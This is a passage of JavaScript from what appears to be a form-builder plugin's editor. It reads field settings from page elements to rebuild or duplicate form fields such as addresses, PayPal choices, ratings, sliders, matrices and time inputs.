				type_paypal_select(id, w_field_label, w_field_label_pos, w_size, w_choices,w_choices_price, w_choices_checked, w_required,  w_quantity, w_class, w_attr_name, w_attr_value, w_choices_disabled, w_property,w_property_type, w_property_values); break;
			}
			case 'type_country':
			{	
				w_countries=[];

				select_=document.getElementById(id+'_elementform_id_temp');
				n=select_.childNodes.length;
				for(i=0; i<n; i++)
				{
					w_countries.push(select_.childNodes[i].value);
				}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_country(id, w_field_label, w_countries, w_field_label_pos, w_size, w_required, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_captcha':
			{
				w_digit=document.getElementById("_wd_captchaform_id_temp").getAttribute("digit");
				atrs=return_attributes('_wd_captchaform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_captcha(id, w_field_label, w_field_label_pos, w_digit, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_recaptcha':
			{
				w_public  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("public_key");
				w_private  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("private_key");
				w_theme  = document.getElementById("wd_recaptchaform_id_temp").getAttribute("theme");
				
				atrs=return_attributes('wd_recaptchaform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_recaptcha(id, w_field_label, w_field_label_pos, w_public, w_private, w_theme, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_map':
			{
				w_lat=[];
				w_long=[];
				w_info=[];
				
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				
				
				
				for(j=0; j<=20; j++)
					if( document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j))
					{
						w_lat.push(document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j));
						w_long.push(document.getElementById(id+"_elementform_id_temp").getAttribute("long"+j));
						w_info.push(document.getElementById(id+"_elementform_id_temp").getAttribute("info"+j));
					}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_map(id, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value); break;
			}
			case 'type_mark_map':
			{
				w_info  = document.getElementById(id+"_elementform_id_temp").getAttribute("info0");
				w_long  = document.getElementById(id+"_elementform_id_temp").getAttribute("long0");
				w_lat   = document.getElementById(id+"_elementform_id_temp").getAttribute("lat0");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_mark_map(id, w_field_label, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value); break;
			}
			case 'type_submit_reset':
			{
				atrs=return_attributes(id+'_element_submitform_id_temp');
				w_act=!(document.getElementById(id+"_element_resetform_id_temp").style.display=="none");
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_submit_title = document.getElementById(id+"_element_submitform_id_temp").value;
				w_reset_title  = document.getElementById(id+"_element_resetform_id_temp").value;
				type_submit_reset(id, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value); break;
			}

			case 'type_button':
			{
				w_title	=new Array();	
			
				w_func	=new Array();
				t=0;
				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						w_title[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_func[t]=document.getElementById(id+"_elementform_id_temp"+k).getAttribute("onclick");
						t++;
						v=k;
					}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_button (id, w_title , w_func , w_class,w_attr_name, w_attr_value); break;
			}
			case 'type_hidden':
			{
				w_value  = document.getElementById(id+"_elementform_id_temp").value;
				w_name  = document.getElementById(id+"_elementform_id_temp").name;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_hidden (id, w_name, w_value , w_attr_name, w_attr_value); break;
			}

		}
	
		
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

	var pos=document.getElementsByName("el_pos");
		pos[0].setAttribute("disabled", "disabled");
		pos[1].setAttribute("disabled", "disabled");
		pos[2].setAttribute("disabled", "disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.setAttribute("disabled", "disabled");

  // form_maker_edit_in_popup(11);
}

function dublicate(id) {
	type=document.getElementById(id).getAttribute('type');
	//////////////////////////////parameter take
	if(document.getElementById(id+'_element_labelform_id_temp').innerHTML)
		w_field_label=document.getElementById(id+'_element_labelform_id_temp').innerHTML;
	labels=all_labels();
	m=0;
	t=true;
	if(type!="type_section_break")
	{
	while(t)
	{	
		m++;
		for(k=0; k<labels.length; k++)
		{
			t=true;
			if(labels[k]==w_field_label+'('+m+')')
				break;
			t=false;
		}	
	}
	w_field_label=w_field_label+'('+m+')';
	}
	k=0;
	
	w_choices=new Array();	
	w_choices_checked=new Array();
	w_choices_disabled=new Array();
	w_allow_other_num = 0;
  w_property = new Array();
	w_property_type = new Array();
	w_property_values = new Array();
	w_choices_price = new Array();
	t = 0;
	if(document.getElementById(id+'_label_and_element_sectionform_id_temp'))
		w_field_label_pos="top";
	else
		w_field_label_pos="left";
		
	if(document.getElementById(id+"_elementform_id_temp"))
	{
		s=document.getElementById(id+"_elementform_id_temp").style.width;
		 w_size=s.substring(0,s.length-2);
	}
	
	if(document.getElementById(id+"_requiredform_id_temp"))
	  	w_required=document.getElementById(id+"_requiredform_id_temp").value;
		
	if(document.getElementById(id+"_uniqueform_id_temp"))
	  	w_unique=document.getElementById(id+"_uniqueform_id_temp").value;
		
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	{
		w_class=document.getElementById(id+'_label_sectionform_id_temp').getAttribute("class");
		if(!w_class)
			w_class="";
	}
		

	switch(type)
		{
			case 'type_editor':
			{
				w_editor=document.getElementById(id+"_element_sectionform_id_temp").innerHTML;
				// type_editor(gen, w_editor); add(0); break;
				type_editor(gen, w_editor);  break;
			}
			case 'type_section_break':
			{
				w_editor=document.getElementById(id+"_element_sectionform_id_temp").innerHTML;
				// type_section_break(gen, w_editor); add(0); break;
				type_section_break(gen, w_editor);  break;
			}
			case 'type_text':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_text(gen, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value); add(0); break;
				type_text(gen, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value);break;
			}
			case 'type_number':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_number(gen, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value); add(0); break;
				type_number(gen, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value);break;
			}
			case 'type_password':
			{
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_password(gen, w_field_label, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value); add(0); break;
				type_password(gen, w_field_label, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value);break;
			}
			case 'type_textarea':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				s=document.getElementById(id+"_elementform_id_temp").style.height;
				w_size_h=s.substring(0,s.length-2);

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_textarea(gen, w_field_label, w_field_label_pos, w_size, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value); add(0); break;
				type_textarea(gen, w_field_label, w_field_label_pos, w_size, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value);break;
			}
			case 'type_phone':
			{
				w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
				w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
				s=document.getElementById(id+"_element_lastform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				
				if(document.getElementById(id+"_mini_label_area_code"))
				w_mini_labels= [document.getElementById(id+"_mini_label_area_code").innerHTML, document.getElementById(id+"_mini_label_phone_number").innerHTML];
				else
				w_mini_labels= ['Area Code', 'Phone Number'];
				
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_phone(gen, w_field_label, w_field_label_pos, w_size,  w_first_val, w_title, w_mini_labels, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_name':
			{
				if(document.getElementById(id+'_element_middleform_id_temp'))
					w_name_format="extended";
				else
					w_name_format="normal";

				
				if(w_name_format=="normal")	
				{
				w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
				w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
				}
				else
				{
				w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value, document.getElementById(id+"_element_titleform_id_temp").value, document.getElementById(id+"_element_middleform_id_temp").value];
				w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title, document.getElementById(id+"_element_titleform_id_temp").title,
				document.getElementById(id+"_element_middleform_id_temp").title];
				}
				
				if(document.getElementById(id+"_mini_label_title"))
				w_mini_title = document.getElementById(id+"_mini_label_title").innerHTML;
				else
				w_mini_title = "Title";
				
				if(document.getElementById(id+"_mini_label_middle"))
				w_mini_middle = document.getElementById(id+"_mini_label_middle").innerHTML;
				else
				w_mini_middle = "Middle";
				
				w_mini_labels = [ w_mini_title, document.getElementById(id+"_mini_label_first").innerHTML,document.getElementById(id+"_mini_label_last").innerHTML, w_mini_middle]; 	       
				
		
				s=document.getElementById(id+"_element_firstform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_name(gen, w_field_label, w_field_label_pos, w_first_val, w_title,  w_mini_labels, w_size, w_name_format, w_required, w_unique, w_class, w_attr_name, w_attr_value);  break;
			}
			case 'type_address':
			{
				s=document.getElementById(id+"_div_address").style.width;
				w_size=s.substring(0,s.length-2);
				
				
			if(document.getElementById(id+"_disable_fieldsform_id_temp"))
			{	
				if(document.getElementById(id+"_mini_label_street1")) {
							w_street1= document.getElementById(id+"_mini_label_street1").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_street1form_id_temp")) {
					w_street1 = document.getElementById(id+"_street1form_id_temp").value;
				  }
				  else {
					w_street1 = '';
				  }
				}
						if (document.getElementById(id+"_mini_label_street2")) {
							w_street2= document.getElementById(id+"_mini_label_street2").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_street2form_id_temp")) {
					w_street2 = document.getElementById(id+"_street2form_id_temp").value;
				  }
				  else {
					w_street2 = '';
				  }
				}
							
						if (document.getElementById(id+"_mini_label_city")) {
							w_city= document.getElementById(id+"_mini_label_city").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_cityform_id_temp")) {
					w_city = document.getElementById(id+"_cityform_id_temp").value;
				  }
				  else {
					w_city = '';
				  }
				}

						if (document.getElementById(id+"_mini_label_state")) {
							w_state= document.getElementById(id+"_mini_label_state").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_stateform_id_temp")) {
					w_state = document.getElementById(id+"_stateform_id_temp").value;
				  }
				  else {
					w_state = '';
				  }
				}
						if (document.getElementById(id+"_mini_label_postal")) {
							w_postal= document.getElementById(id+"_mini_label_postal").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_postalform_id_temp")) {
					w_postal = document.getElementById(id+"_postalform_id_temp").value;
				  }
				  else {
					w_postal = '';
				  }
				}
							
				if (document.getElementById(id+"_mini_label_country")) {
					w_country= document.getElementById(id+"_mini_label_country").innerHTML;
				}
						else {
				  if (document.getElementById(id+"_countryform_id_temp")) {
					w_country = document.getElementById(id+"_countryform_id_temp").value;
				  }
				  else {
					w_country = '';
				  }
				}
				w_mini_labels=[w_street1, w_street2, w_city, w_state, w_postal, w_country];
				var disabled_input = document.getElementById(id+"_disable_fieldsform_id_temp");
				
					w_street1_dis= disabled_input.getAttribute('street1');
					w_street2_dis= disabled_input.getAttribute('street2');
					w_city_dis= disabled_input.getAttribute('city');
					w_state_dis= disabled_input.getAttribute('state');
					w_postal_dis= disabled_input.getAttribute('postal');
					w_country_dis= disabled_input.getAttribute('country');
				
						
				w_disabled_fields=[w_street1_dis, w_street2_dis, w_city_dis, w_state_dis, w_postal_dis, w_country_dis];
			}
			else
			{
				w_mini_labels=['Street Address', 'Street Address Line 2', 'City', 'State / Province / Region', 'Postal / Zip Code', 'Country',];
				w_disabled_fields=['no', 'no', 'no', 'no', 'no', 'no'];	
			}
			
				atrs=return_attributes(id+'_street1form_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_address(gen, w_field_label, w_field_label_pos, w_size, w_mini_labels, w_disabled_fields, w_required, w_class, w_attr_name, w_attr_value);
        disable_fields(id);
        break;
			}


			case 'type_submitter_mail':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				w_send=document.getElementById(id+"_sendform_id_temp").value;
		
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_submitter_mail(gen, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_send, w_required, w_unique, w_class, w_attr_name, w_attr_value); add(0); break;
				type_submitter_mail(gen, w_field_label, w_field_label_pos, w_size, w_first_val, w_title, w_send, w_required, w_unique, w_class, w_attr_name, w_attr_value);break;
			}
			case 'type_checkbox': {
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;
		
				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
				if(document.getElementById(id+"_rowcol_numform_id_temp") && document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
				
				w_rowcol = 1;
				}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_checkbox(gen, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value); break;
			}
      case 'type_paypal_price':
			{
				w_first_val=[document.getElementById(id+"_element_dollarsform_id_temp").value, document.getElementById(id+"_element_centsform_id_temp").value];
				w_title=[document.getElementById(id+"_element_dollarsform_id_temp").title, document.getElementById(id+"_element_centsform_id_temp").title];
				
				if(document.getElementById(id+"_td_name_cents").style.display=="none")
					w_hide_cents='yes';
				else
					w_hide_cents='no';
				
						
				s=document.getElementById(id+"_element_dollarsform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				atrs=return_attributes(id+'_element_dollarsform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_range_min=document.getElementById(id+"_range_minform_id_temp").value;
				w_range_max=document.getElementById(id+"_range_maxform_id_temp").value;
        w_mini_labels = [document.getElementById(id+"_mini_label_dollars").innerHTML,document.getElementById(id+"_mini_label_cents").innerHTML];
				type_paypal_price(gen, w_field_label, w_field_label_pos, w_first_val, w_title, w_mini_labels, w_size, w_required, w_hide_cents, w_class, w_attr_name, w_attr_value, w_range_min , w_range_max); break;
			}
			
			case 'type_paypal_checkbox':
			{	
			
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";

				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;
		
				v=0;
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_label_element"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
					
				}
				w_quantity="no";
				if(document.getElementById(id+"_element_quantityform_id_temp"))
				{
					w_quantity='yes';
				}

				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_checkbox(gen, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value,  w_property, w_property_type, w_property_values,w_quantity); break;
			}
			case 'type_radio':
			{	
				
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
				
				w_rowcol = '';
				}	
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_radio(gen, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value); break;
			}
      case 'type_paypal_radio':
			{	
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				v=0;
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_label_element"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
				
				}
				
				w_quantity="no";
				if(document.getElementById(id+"_element_quantityform_id_temp"))
				{
					w_quantity='yes';
				}

				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_radio(gen, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_property, w_property_type, w_property_values,w_quantity);  break;
			}
		
			case 'type_paypal_shipping':
			{	
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				v=0;
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other'))
							if(document.getElementById(id+"_elementform_id_temp"+k).getAttribute('other')=='1')
								w_allow_other_num=t;
						w_choices[t]=document.getElementById(id+"_label_element"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+k).checked;
						t++;
						v=k;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
				
				}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_shipping(gen, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_property, w_property_type, w_property_values);   break;
			}
      case 'type_paypal_total':
			{	
				
				type_paypal_total(gen, w_field_label, w_field_label_pos,  w_class); break;
			}
			
			case 'type_star_rating':
			{
				w_star_amount  = document.getElementById(id+"_star_amountform_id_temp").value;
				w_field_label_col  = document.getElementById(id+"_star_colorform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_star_rating(gen, w_field_label, w_field_label_pos, w_field_label_col, w_star_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_scale_rating':
			{
				w_mini_labels  =[document.getElementById(id+"_mini_label_worst").innerHTML,document.getElementById(id+"_mini_label_best").innerHTML];	
				w_scale_amount = document.getElementById(id+"_scale_amountform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_scale_rating(gen, w_field_label, w_field_label_pos, w_mini_labels, w_scale_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
		
			case 'type_spinner':
			{
				w_field_min_value  = document.getElementById(id+"_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_spinner_widthform_id_temp").value;
				w_field_step = document.getElementById(id+"_stepform_id_temp").value;
				w_field_value  = document.getElementById(id+"_elementform_id_temp").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_spinner(gen, w_field_label, w_field_label_pos, w_field_width, w_field_min_value, w_field_max_value, w_field_step, w_field_value, w_required, w_class, w_attr_name, w_attr_value) ; break;
			
			
			}
			case 'type_slider':
			{
				w_field_min_value  = document.getElementById(id+"_slider_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_slider_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_slider_widthform_id_temp").value;
				w_field_value  = document.getElementById(id+"_slider_valueform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_slider(gen, w_field_label, w_field_label_pos,  w_field_width, w_field_min_value, w_field_max_value, w_field_value, w_required, w_class, w_attr_name, w_attr_value);  break;
			}
			
			case 'type_range':
			{
				
				w_field_range_width  = document.getElementById(id+"_range_widthform_id_temp").value;
				w_field_range_step = document.getElementById(id+"_range_stepform_id_temp").value;
				
				w_field_value1  = document.getElementById(id+"_elementform_id_temp0").getAttribute("aria-valuenow");
				w_field_value2  = document.getElementById(id+"_elementform_id_temp1").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_mini_labels = [document.getElementById(id+"_mini_label_from").innerHTML,document.getElementById(id+"_mini_label_to").innerHTML];
				type_range(gen, w_field_label, w_field_label_pos, w_field_range_width, w_field_range_step, w_field_value1, w_field_value2, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value) ; break;
			
			
			}
			case 'type_grading':
			{
				
				
				w_total = document.getElementById(id+"_grading_totalform_id_temp").value;
				w_items=[];
				
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k))
					{
						
						w_items.push(document.getElementById(id+"_label_elementform_id_temp"+k).innerHTML);
						
					}
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_grading(gen, w_field_label, w_field_label_pos, w_items, w_total, w_required, w_class, w_attr_name, w_attr_value) ; refresh_grading_items(gen);  break;
			
			
			}
			case 'type_matrix':
			{	
                w_rows=[];
				w_rows[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k+"_0"))
					{
						
						w_rows.push(document.getElementById(id+"_label_elementform_id_temp"+k+"_0").innerHTML);
						
					}
			
			    w_columns=[];
				w_columns[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp0_"+k))
					{
						
						w_columns.push(document.getElementById(id+"_label_elementform_id_temp0_"+k).innerHTML);
						
					}
					
			w_field_input_type = document.getElementById(id+"_input_typeform_id_temp").value;		
					
			atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
			type_matrix(gen, w_field_label, w_field_label_pos, w_field_input_type, w_rows, w_columns, w_required, w_class, w_attr_name, w_attr_value); refresh_matrix(gen);   break; 
			
			
			}
			case 'type_time':
			{	
				atrs=return_attributes(id+'_hhform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_hh=document.getElementById(id+'_hhform_id_temp').value;
				w_mm=document.getElementById(id+'_mmform_id_temp').value;
				if(document.getElementById(id+'_ssform_id_temp'))
				{
					w_ss=document.getElementById(id+'_ssform_id_temp').value;
					w_sec="1";
				}
				else
				{
					w_ss="";
					w_sec="0";
				}
				if(document.getElementById(id+'_am_pm_select'))
				{
					w_am_pm=document.getElementById(id+'_am_pmform_id_temp').value;
					w_time_type="12";
